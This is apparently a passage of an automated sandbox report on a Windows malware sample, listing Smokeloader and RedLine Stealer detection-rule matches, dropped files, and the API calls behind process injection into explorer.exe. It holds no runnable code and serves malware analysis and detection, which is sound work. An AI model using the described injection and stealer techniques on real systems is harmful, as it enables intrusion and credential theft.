Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403247 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403247
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040324F NtTerminateProcess,RtlInitUnicodeString,	0_2_0040324F
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403256 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403256
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040326C NtTerminateProcess,RtlInitUnicodeString,	0_2_0040326C
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403277 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403277
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040327D NtTerminateProcess,RtlInitUnicodeString,	0_2_0040327D
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403290 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401514
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F97
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401542
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403247 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403247
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401549
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040324F NtTerminateProcess,RtlInitUnicodeString,	4_2_0040324F
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403256 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403256
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401557
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040326C NtTerminateProcess,RtlInitUnicodeString,	4_2_0040326C
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403277 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403277
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040327D NtTerminateProcess,RtlInitUnicodeString,	4_2_0040327D
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004032C7 ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,	4_2_004032C7
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014FE
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403290 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403290
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,	7_2_00403043
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00401508 NtAllocateVirtualMemory,	7_2_00401508
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014CF NtAllocateVirtualMemory,	7_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014DE NtAllocateVirtualMemory,	7_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014F5 NtAllocateVirtualMemory,	7_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014F8 NtAllocateVirtualMemory,	7_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014FB NtAllocateVirtualMemory,	7_2_004014FB
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00403043 RtlCreateUserThread,NtTerminateProcess,	8_2_00403043
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004014C4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00401508 NtAllocateVirtualMemory,	8_2_00401508
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014CF NtAllocateVirtualMemory,	8_2_004014CF
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015D5
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014DE NtAllocateVirtualMemory,	8_2_004014DE
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015DF
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015E6
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015F2
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014F5 NtAllocateVirtualMemory,	8_2_004014F5
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014F8 NtAllocateVirtualMemory,	8_2_004014F8
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014FB NtAllocateVirtualMemory,	8_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C34B92 RtlMoveMemory,NtUnmapViewOfSection,	11_2_00C34B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C333C3 NtQueryInformationFile,	11_2_00C333C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	11_2_00C3349B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3342B NtQueryObject,NtQueryObject,RtlMoveMemory,	11_2_00C3342B
Source: C:\Windows\explorer.exe	Code function: 13_2_00D338B0 NtUnmapViewOfSection,	13_2_00D338B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	14_2_00C21016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21A80 NtCreateSection,NtMapViewOfSection,	14_2_00C21A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	14_2_00C21819
Source: C:\Windows\explorer.exe	Code function: 15_2_0035355C NtUnmapViewOfSection,	15_2_0035355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	16_2_00AD1016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD1B26 NtCreateSection,NtMapViewOfSection,	16_2_00AD1B26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	16_2_00AD18BF
Source: C:\Windows\explorer.exe	Code function: 17_2_00E0370C NtUnmapViewOfSection,	17_2_00E0370C

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00418C80	0_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00418C80	4_2_00418C80
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004189C0	7_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004189C0	8_2_004189C0
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B69AC8	9_2_00007FF780B69AC8
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6DC08	9_2_00007FF780B6DC08
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6A774	9_2_00007FF780B6A774
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6A51C	9_2_00007FF780B6A51C
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6213C	9_2_00007FF780B6213C
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6B424	9_2_00007FF780B6B424
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B63220	9_2_00007FF780B63220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32198	11_2_00C32198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3C2F9	11_2_00C3C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C4B35C	11_2_00C4B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C84438	11_2_00C84438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C4B97E	11_2_00C4B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C36E6A	11_2_00C36E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C55F08	11_2_00C55F08
Source: C:\Windows\explorer.exe	Code function: 13_2_00D31E20	13_2_00D31E20
Source: C:\Windows\explorer.exe	Code function: 15_2_00352860	15_2_00352860
Source: C:\Windows\explorer.exe	Code function: 15_2_00352054	15_2_00352054
Source: C:\Windows\explorer.exe	Code function: 17_2_00E020F4	17_2_00E020F4
Source: C:\Windows\explorer.exe	Code function: 17_2_00E02A04	17_2_00E02A04
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00406E80	33_2_00406E80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00418C80	33_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004084AD	33_2_004084AD
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004040B4	33_2_004040B4
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00401D5E	33_2_00401D5E
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004073C4	33_2_004073C4
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004097A1	33_2_004097A1
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00406E80	34_2_00406E80
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004084AD	34_2_004084AD
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004040B4	34_2_004040B4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00401D5E	34_2_00401D5E
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004189C0	34_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004073C4	34_2_004073C4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004097A1	34_2_004097A1

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00C38801 appears 40 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00C37F70 appears 32 times

Source: OCYe9qcxiM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: OCYe9qcxiM.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4470.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hehcrfb.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fihcrfb.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@63/15@5/4

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Code function: 0_2_0079273A CreateToolhelp32Snapshot,Module32First,

0_2_0079273A

